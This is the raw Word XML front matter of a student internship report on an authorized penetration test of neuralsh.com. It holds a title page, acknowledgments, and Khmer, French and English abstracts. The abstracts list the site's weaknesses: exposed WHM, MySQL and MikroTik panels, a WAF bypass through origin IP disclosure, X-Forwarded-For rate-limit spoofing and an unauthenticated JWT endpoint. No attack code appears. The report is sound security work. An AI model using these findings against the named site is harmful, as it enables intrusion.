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ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>INSTITUTION OF TECHNOLOGY OF CAMBODIA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Department of General Studies and Natural Sciences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bachelor of Information and Communication Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INTERNSHIP REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>VULNERABILITY ASSESSMENT AND PENETRATION TESTING (VAPT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ON A WEB APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A Case Study of neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4535"/>
        <w:gridCol w:w="4535"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Student Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Your Full Name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Student ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Your Student ID]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Academic Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Supervisor Name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Company Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Prestige Alliance Co., Ltd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Submission Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11905" w:h="16837"/>
          <w:pgMar w:top="1133" w:right="1133" w:bottom="1133" w:left="1700"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ACKNOWLEDGMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Before I start this report, I would like to express my sincere gratitude to my school and to everyone who has contributed to the making of this report. Everyone has dedicated their hard work and efforts, without which it would not have been possible to achieve this accomplishment. I am very grateful for the opportunity and the guidance that allowed me to grow and enhance my knowledge in both hard and soft skills. I would like to extend my appreciation to the following individuals:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First of all, I would like to offer my sincere thanks to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>H.E. PO Kimtho, Director of the Institute of Technology of Cambodia, a.k.a (ITC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. For his leadership and efforts that steer this institute to be one of the top universities in Cambodia. His cooperation with local and international enterprises has been instrumental in making this opportunity possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Secondly, I would like to express my appreciation to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MR. LAY Heng, Head of Department of Information and Communication Engineering (GIC) at ITC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. His guidance and management have provided excellent education and courses within my department which are the foundation of this internship.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Thirdly, I would like to give my deep gratitude to my supervisor, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DR. KUY Movsun, Lecturer at the Department of Information and Communication Engineering (GIC), ITC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. His kindness and dedication of time have guided this internship to achieve its goals. From the beginning of the internship to the final report, his thoughtful suggestions were invaluable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, I would like to express my sincere thanks to my advisor, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MR. KIM Sereyvuth, Head of Red Team at Prestige Alliance Co., Ltd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. He has allowed me to conduct this vulnerability assessment and penetration testing engagement and generously dedicated his invaluable time to allow me to learn more in cybersecurity skills. He provided the incredible opportunity that enhanced my technical skills.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Additionally, I would like to extend my deep appreciation to all others who have supported me during this internship. Your kindness and assistance have been essential to this accomplishment. I wish everyone all the best.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>សេចក្តីសង្ខេប</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:lineRule="auto" w:line="240" w:after="160"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>neuralsh.com ជាវេទិកាស្វែងរកបញ្ញាសិប្បនិម្មិត ដំណើរការដោយ Prestige Alliance Co., Ltd. ត្រូវបានជ្រើសរើស ជាគោលដៅ នៃការស្រាវជ្រាវ VAPT នេះ។ ការស្រាវជ្រាវ ប្រើប្រាស់វិធីសាស្ត្រ Black-box ផ្អែកលើ OWASP Testing Guide ចែកចេញជា ៥ ដំណាក់កាល ។ ដំណាក់កាលទាំង ៥ រួមមាន ការស្វែងរកព័ត៌មាន (Reconnaissance) ការស្កែន និងការរាប់ (Scanning &amp; Enumeration) ការវាយតម្លៃភាពងាយរងគ្រោះ (Vulnerability Assessment) ការទាញយកប្រយោជន៍ (Exploitation) និង ការវិភាគក្រោយការទាញយកប្រយោជន៍ (Post-Exploitation) ។ ឧបករណ៍ដូចជា Nmap, Nikto, Burp Suite, Shodan និង Metasploit ត្រូវបានប្រើប្រាស់ ក្នុងដំណាក់កាលស្កែន ការរាប់ និងការទាញយកប្រយោជន៍ ។</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:lineRule="auto" w:line="240" w:after="160"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ចំពោះលទ្ធផល ភាពងាយរងគ្រោះ ១៧ ចំណុច ត្រូវបានរកឃើញ ចែកចេញជា ៤ វិកល្ប ៤ ខ្ពស់ ៦ មធ្យម និង ៣ ទាប ។ ចំណុចវិកល្បរួមមាន ផ្ទាំងគ្រប់គ្រង WHM root server ដែលអាចចូលប្រើបានដោយសាធារណជន ច្រកទ្វារ MySQL បង្ហាញ​លើ Internet ផ្ទាំងគ្រប់គ្រងបណ្ដាញ MikroTik ដែលត្រូវបង្ហាញ និង ការរំលំ WAF Cloudflare តាមការបង្ហាញ IP ដើម ។ ខ្សែច្រវ៉ាក់ ២ ត្រូវបានបញ្ជាក់ ។ ការរំលំ Rate Limit ត្រូវបានធ្វើ ដោយប្រើ X-Forwarded-For header ឈានដល់ ១០០ ភាគរយ ក្នុងចំណោម ៥០ ចំណោម ៥០ ។ ច្រកចូល JWT ដែលគ្មានការផ្ទៀងផ្ទាត់ ត្រូវបានរកឃើញ ដែលអនុញ្ញាតឱ្យបង្កើត token គ្មានដែនកំណត់ ។</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:lineRule="auto" w:line="240" w:after="160"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>របាយការណ៍ VAPT ពេញលេញ ដែលមានអនុសាសន៍ ចាត់ចំណាត់ថ្នាក់ ដោយ CVSS v3.1 ត្រូវបានប្រគល់ជូន Prestige Alliance Co., Ltd.។ ការរកឃើញ​ បង្ហាញ ហានិភ័យ​ ធ្ងន់ធ្ងរ ក្នុង shared hosting infrastructure ការចូលប្រើ origin server និង API authentication controls ដែលទាមទារ ការដោះស្រាយ ភ្លាមៗ ។</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>RÉSUMÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce mémoire présente un engagement d'Évaluation des Vulnérabilités et de Tests de Pénétration (VAPT) conduit sur neuralsh.com, une plateforme de recherche neurale alimentée par l'intelligence artificielle, exploitée par Prestige Alliance Co., Ltd. Les travaux ont été réalisés dans le cadre d'un stage de 4 mois, de février à mai 2026, avec l'autorisation écrite préalable de l'organisation. L'objectif principal de cet engagement était d'évaluer la posture de sécurité de la plateforme cible en simulant des attaques réelles, afin d'identifier et de documenter les vulnérabilités exploitables avant qu'elles ne soient découvertes par des acteurs malveillants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Une approche boîte noire a été suivie tout au long de l'engagement, simulant un attaquant externe sans connaissance préalable du système cible. La démarche a été conduite en conformité avec le guide de test OWASP et structurée en cinq phases séquentielles : reconnaissance, analyse et énumération, évaluation des vulnérabilités, exploitation et post-exploitation. Des outils spécialisés ont été employés à chaque phase, notamment Nmap, Nikto, Burp Suite, Shodan et Metasploit, sélectionnés selon leur pertinence par rapport aux objectifs spécifiques de chaque étape.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dix-sept vulnérabilités ont été identifiées : quatre Critiques, quatre Élevées, six Moyennes et trois Faibles. Les résultats critiques comprennent un panneau d'administration WHM accessible publiquement sans restriction d'adresse IP, un port MySQL exposé directement sur Internet, un panneau d'administration réseau MikroTik accessible à distance, et un contournement du pare-feu applicatif Cloudflare rendu possible par la divulgation de l'adresse IP du serveur d'origine. Ces failles, combinées, exposent l'ensemble de l'infrastructure à un risque de compromission totale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deux chaînes d'exploitation ont été confirmées durant l'engagement. Un contournement de la limitation de débit d'authentification a été exécuté via la falsification d'en-têtes HTTP X-Forwarded-For, atteignant un taux de réussite de 100 % avec 50 requêtes réussies sur 50, sans aucune réponse de limitation déclenchée. Par ailleurs, un point d'accès de génération de jetons JWT non authentifié a été confirmé actif, permettant une génération illimitée de jetons sans identifiants valides. Un rapport complet incluant des recommandations de remédiation classées par score </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVSS v3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a été remis à Prestige Alliance Co., Ltd., afin de permettre une correction priorisée des vulnérabilités identifiées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis presents a Vulnerability Assessment and Penetration Testing (VAPT) engagement conducted on neuralsh.com, an AI-powered neural search platform operated by Prestige Alliance Co., Ltd. The work was carried out over a 4-month internship from February to May 2026, under written authorization from the organization prior to any testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A black-box methodology was applied throughout the engagement, simulating an external adversary with no prior system knowledge. The testing process followed the OWASP Testing Guide and was structured into five sequential phases: reconnaissance, scanning and enumeration, vulnerability assessment, exploitation, and post-exploitation analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Seventeen vulnerabilities were identified across the target environment: four Critical, four High, six Medium, and three Low severity findings. Critical findings included a publicly accessible WHM root server administration panel, an internet-facing MySQL database port, an exposed MikroTik network device administration panel, and a Cloudflare Web Application Firewall bypass achieved through origin IP disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Two exploitation chains were confirmed during the engagement. An authentication rate-limiting bypass was executed via X-Forwarded-For HTTP header spoofing, achieving 50 successful requests with zero rate-limit responses — a 100 percent bypass rate. Additionally, an unauthenticated JWT token generation endpoint was confirmed active, enabling unlimited token farming without valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A complete penetration testing report with remediation recommendations prioritised by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVSS v3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> score was delivered to Prestige Alliance Co., Ltd. The findings highlight critical risks in shared hosting infrastructure exposure, origin server accessibility, and API authentication controls that require immediate remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[Right-click → Update Field to generate Table of Contents]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LIST OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Prestige Alliance company logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Prestige Alliance organisational structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
